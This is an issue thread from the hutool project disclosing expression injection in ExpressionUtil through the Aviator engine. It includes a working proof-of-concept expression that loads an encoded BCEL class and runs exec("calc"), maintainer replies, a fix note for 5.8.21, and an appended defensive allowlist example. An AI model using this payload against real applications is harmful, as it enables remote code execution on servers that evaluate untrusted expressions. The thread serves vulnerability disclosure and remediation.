dromara / hutool
ExpressionUtil expression injection

Status: Done
Opened this issue 2023-01-14 17:44

Description

Following the example given in the official documentation, using the Aviator template engine, parsing an untrusted expression string may be vulnerable to code execution; even the current latest version of Aviator (5.3.3) is still affected.


Example

String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"calc\") );";
final Object eval = ExpressionUtil.eval(exp, null);


Reference

  1. https://github.com/killme2008/aviatorscript/issues/421
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41862
  3. https://mvnrepository.com/artifact/com.googlecode.aviator/aviator

Comments (5)

JOHNSON created task
JOHNSON changed description
JOHNSON changed description

Hutool itself is only a facade over expression engines; the vulnerability is in the concrete implementation, and Hutool has no way to patch or control it.

We can only see whether the implementing library can fix it. If it cannot be fixed, switch engines.

Looly changed issue state from To do to Done
Looly added question label
Looly changed issue state from Done to To do

Given the endless questions about this, decided:

  1. Remove ExpressionUtil entirely in 6.0.0

This seems to be a solution too. Many utility-library products now have vulnerabilities flagged by scanners that cannot be fixed, and in such cases the author really cannot solve it. The developers can't be bothered to fix it, so they simply delete the corresponding feature.

Exactly right.

Looly changed issue state from To do to Done
Looly added bug label
Looly removed question label
Looly added enhancement label
Looly added feature label
Looly removed enhancement label
Looly removed bug label
Looly changed issue state from Done to To do
Looly changed issue state from To do to Done
Looly added bug label

Fixed in 5.8.21.

Added allowClassSet.
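As a defender-side illustration added here (not code from this issue, from Hutool, or from AviatorScript), the following builds a dedicated AviatorScript evaluator with a class allowlist and a minimal feature set, so that an expression shaped like the one reported above is rejected instead of executed. `Options.ALLOWED_CLASS_SET` and `Options.FEATURE_SET` are AviatorScript's own options; the class name, the constructed stand-in payload, and the exact exception type thrown on rejection are assumptions, which is why the catch is broad.

```java
import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;

import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

public class SafeExpressionEval {

    // A dedicated evaluator instance, separate from the global singleton,
    // so these restrictions cannot be loosened by other code that shares
    // AviatorEvaluator's default instance.
    private static final AviatorEvaluatorInstance ENGINE = buildRestrictedEngine();

    private static AviatorEvaluatorInstance buildRestrictedEngine() {
        AviatorEvaluatorInstance engine = AviatorEvaluator.newInstance();
        // Allowlist of classes usable for `new` and static method calls.
        // Class, ClassLoader and Runtime are deliberately absent, so the
        // Class.forName(...) call in the reported payload is not permitted.
        Set<Class<?>> allowed = new HashSet<>();
        allowed.add(String.class);
        allowed.add(Math.class);
        engine.setOption(Options.ALLOWED_CLASS_SET, allowed);
        // Empty syntax feature set: no assignment, no `new`, no static
        // method calls, no lambdas or loops. Plain arithmetic still works,
        // but the `c = ...` part of the payload is refused at parse time.
        engine.setOption(Options.FEATURE_SET, Feature.asSet());
        return engine;
    }

    /** Evaluates an untrusted expression under the restricted engine. */
    public static Object evalUntrusted(String expression, Map<String, Object> env) {
        return ENGINE.execute(expression, env);
    }

    public static void main(String[] args) {
        Map<String, Object> env = new HashMap<>();
        env.put("x", 41);
        System.out.println(evalUntrusted("x + 1", env));

        // Constructed stand-in for the reported payload: same shape
        // (assignment plus Class.forName), without the BCEL class blob.
        String hostile = "'a'+(c=Class.forName(\"java.lang.Runtime\"))";
        try {
            evalUntrusted(hostile, env);
            System.out.println("unexpected: expression was evaluated");
        } catch (Exception e) { // parse or runtime exception from AviatorScript
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Logging the rejected expression (not just the message) gives a detection signal for callers that feed user input into the engine.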
